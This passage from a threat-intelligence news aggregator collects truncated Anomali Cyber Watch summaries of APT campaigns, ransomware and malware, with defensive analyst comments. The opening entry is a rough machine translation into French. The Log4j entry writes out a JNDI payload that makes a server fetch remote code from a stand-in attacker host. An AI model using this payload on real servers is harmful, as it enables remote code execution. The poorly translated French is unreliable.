e-mail de phishing censé provenir d'un véritable employé de l'ambassade du Kirghizistan.Les pièces jointes malveillantes observées étaient soit des fichiers HTML (CHM) compilés à Microsoft, soit des fichiers Microsoft Excel avec des exploits d'éditeur d'équation.L'objectif des charges utiles est de créer de la persistance via des tâches planifiées et de télécharger d'autres charges utiles de logiciels malveillants (les campagnes amères précédentes ont utilisé le voleur d'identification du navigateur, le voleur de fichiers, le keylogger et les plugins d'outils d'accès à distance).Les attaquants se sont appuyés sur la compression LZX et la concaténation des cordes pour l'évasion de détection. Commentaire de l'analyste: De nombreuses attaques avancées commencent par des techniques de base telles que des e-mails injustifiés avec une pièce jointe qui oblige l'utilisateur à l'ouvrir.Il est important d'enseigner l'hygiène de base en ligne à vos utilisateurs et la sensibilisation au phishing.Il est sûr de recommander de ne jamais ouvrir de fichiers CHM joints et de garder votre bureau MS Office entièrement mis à jour.Tous les indicateurs connus associés à cette campagne amère sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1589.002 - rassembler l'identité des victimesInformations: Adresses e-mail \| [mitre att & amp; ck] t1566.001 -Phishing: attachement de espionnage \| [mitre at	Malware Tool Threat Cloud	APT 37 APT 43	★★
	2022-08-30 15:01:00	Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Phishing - T1566 \|	Ransomware Hack Tool Vulnerability Threat Guideline Cloud	APT 37 APT 29 LastPass
	2022-08-02 15:17:00	Anomali Cyber Watch: Velvet Chollima Steals Emails from Browsers, Austrian Mercenary Leverages Zero-Days, China-Sponsored Group Uses CosmicStrand UEFI Firmware Rootkit, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyber mercenaries, Phishing, Rootkits, Spyware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SharpTongue Deploys Clever Mail-Stealing Browser Extension “SHARPEXT” (published: July 28, 2022) Volexity researchers discovered SharpExt, a new malicious browser app used by the North-Korea sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app, the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter almost exclusively used in South Korea. Following the initial compromise, Velvet Chollima deploy SharpExt and to avoid warning the victim they manually exfiltrate settings files to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows such as a warning regarding extensions running in developer mode. Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it was concentrating on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match). MITRE ATT&CK: [MITRE ATT&CK] Browser Extensions - T1176 \| [MITRE ATT&CK] Email Collection - T1114 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Hide Artifacts - T1564 Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022) Microsoft researchers detail activity of DSIRF, Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting another Adobe Reader vulnerability, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, extracts, decrypts and loads to the memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se	Malware Tool Vulnerability Threat Patching Guideline Cloud	APT 37 APT 28
	2022-06-24 15:00:00	What is iOS Hermit spyware? (lien direct)	>iOS Hermit spyware is a commercial-grade surveillance tool derived from a known Android surveillance tool. Learn more + how to stay safe.	Tool Cloud	APT 37
	2022-05-03 16:31:00	Anomali Cyber Watch: Time-to-Ransom Under Four Hours, Mustang Panda Spies on Russia, Ricochet Chollima Sends Goldbackdoor to Journalists, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, LNK files, Malspam, North Korea, Phishing, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022) ESET researchers found three different teams under China-sponsored umbrella cyberespionage group TA410, which is loosely linked to Stone Panda (APT10, Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog, and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019. Infection has two stages: the Tendyron implant followed by a very complex FlowCloud backdoor. JollyFrog uses generic malware such as PlugX and QuasarRAT. LookingFrog’s infection stages feature the X4 backdoor followed by the LookBack backdoor. Besides using different backdoors and exiting from IP addresses located in three different districts, the three teams use similar tools and similar tactics, techniques, and procedures (TTPs). Analyst Comment: Organizations should keep their web-facing applications such as Microsoft Exchange or SharePoint secured and updated. Educate your employees on handling suspected spearphishing attempts. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Phishing - T1566 \| [MITRE ATT&CK] Native API - T1106 \| [MITRE ATT&CK] Shared Modules - T1129 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Inter-Process Communication - T1559 \| [MITRE ATT&CK] Windows Management Instrumentation - T1047 \| [MITRE ATT&CK] Scheduled Task - T1053 \| [MITRE ATT&CK] Server Software Component - T1505 \| [MITRE ATT&CK] Create or Modify System Process - T1543 \| [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Rootkit - T1014 \| [MITRE ATT&CK] Process Injection - T1055 \|	Ransomware Malware Tool Vulnerability Threat Guideline Cloud	APT 37 APT 10 APT 10
	2021-12-15 16:00:00	Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Remote Services - T1021 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Resource Hijacking - T1496 \| [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1	Malware Tool Vulnerability Threat Cloud	APT 37 APT 29 APT 15 APT 15 APT 25
	2021-12-07 16:04:00	Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub	Ransomware Malware Tool Vulnerability Threat Cloud	APT 37	★★★★
	2021-08-24 17:11:00	Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021) Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks. Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Web Shell - T1100 \| [MITRE ATT&CK] Hidden Files and Directories - T1158 \| [MITRE ATT&CK] Source - T1153 Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021) A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several	Ransomware Malware Tool Vulnerability Threat Patching Cloud	APT 37
	2021-01-08 01:54:44	ALERT: North Korean hackers targeting South Korea with RokRat Trojan (lien direct)	A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government. Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT). "The	Tool Cloud	APT 37

Last update at: 2025-05-10 18:07:56
See our sources.

To see everything: Our RSS (filtrered)